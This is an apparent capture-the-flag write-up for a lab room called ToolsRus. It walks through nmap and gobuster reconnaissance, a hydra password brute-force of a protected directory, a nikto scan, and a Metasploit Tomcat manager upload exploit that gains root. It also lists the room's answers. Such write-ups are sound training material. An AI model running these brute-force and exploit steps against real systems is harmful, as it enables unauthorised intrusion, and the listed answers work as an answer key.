ToolsRus

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.217.167

Detailed Nmap Scan :

Command Breakdown:

• (-sV): Service version

• (-sC): Default nmap scripts

• (-p): Specifying ports 22,80,1234,8009

• (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,80,1234,8009 -oN nmap 10.10.217.167

Enumeration

Port 80

Lets visit the site

It says that the other parts of the website are still functional so lets run gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.217.167

We found two directories, lets first visit /guidelines, which also happens to be the answer to the first question of this room.

Looks like we have a possible username which is bob. This is the answer to the second question in this room.

Now lets look at the other directory /protected. This is the answer to question 3 in this room

Its asking us for a password, we have bob as a username, so lets use hydra to bruteforce the password.

hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.217.167 http-get /protected/

We found the password bubbles which is also the answer to the 4th question in this room

Now we can login

Oh, so now we have to go to the other http port which is 1234 that we saw in the nmap scan, which is also the answer to the 5th question in this room.

Lets visit the site.

Its running Apache Tomcat/7.0.88 which is the answer to question 6.

The next question is asking us to use nikto to scan /manager/html directory on this port

Lets do that.

nikto -h 10.10.217.167:1234/manager/html -id bob:bubbles 

Lets also visit the web application on this port and directory, we have to login using the same credentials, this is what it looks after logging in.

The Nikto scan did not give me anything important as far as I know, the answer to question 7 is "5".

The answer to the next two questions can be found in the nmap scan

Exploitation

Lets fire up Metasploit

msfconsole

Now lets search for tomcat

search tomcat

Looking through all the exploits, number 5 and 6 were the only ones that were interesting and exploits, so I tried number 6.

use exploit/multi/http/tomcat_mgr_upload

Lets look at the options and check what we have to provide to Metasploit to exploit the system.

We need to change the following options:

• Http Username

• Http Password

• RHOSTS

• RPORT

• LHOST

The command to set a value to a parameter

set <Parameter> <Value>

After setting everything up, lets run the exploit

run

Now lets check who we are on the system

And we are root, which is the answer to question 10 in this room. You can also find the last answer in the /root/flag.txt.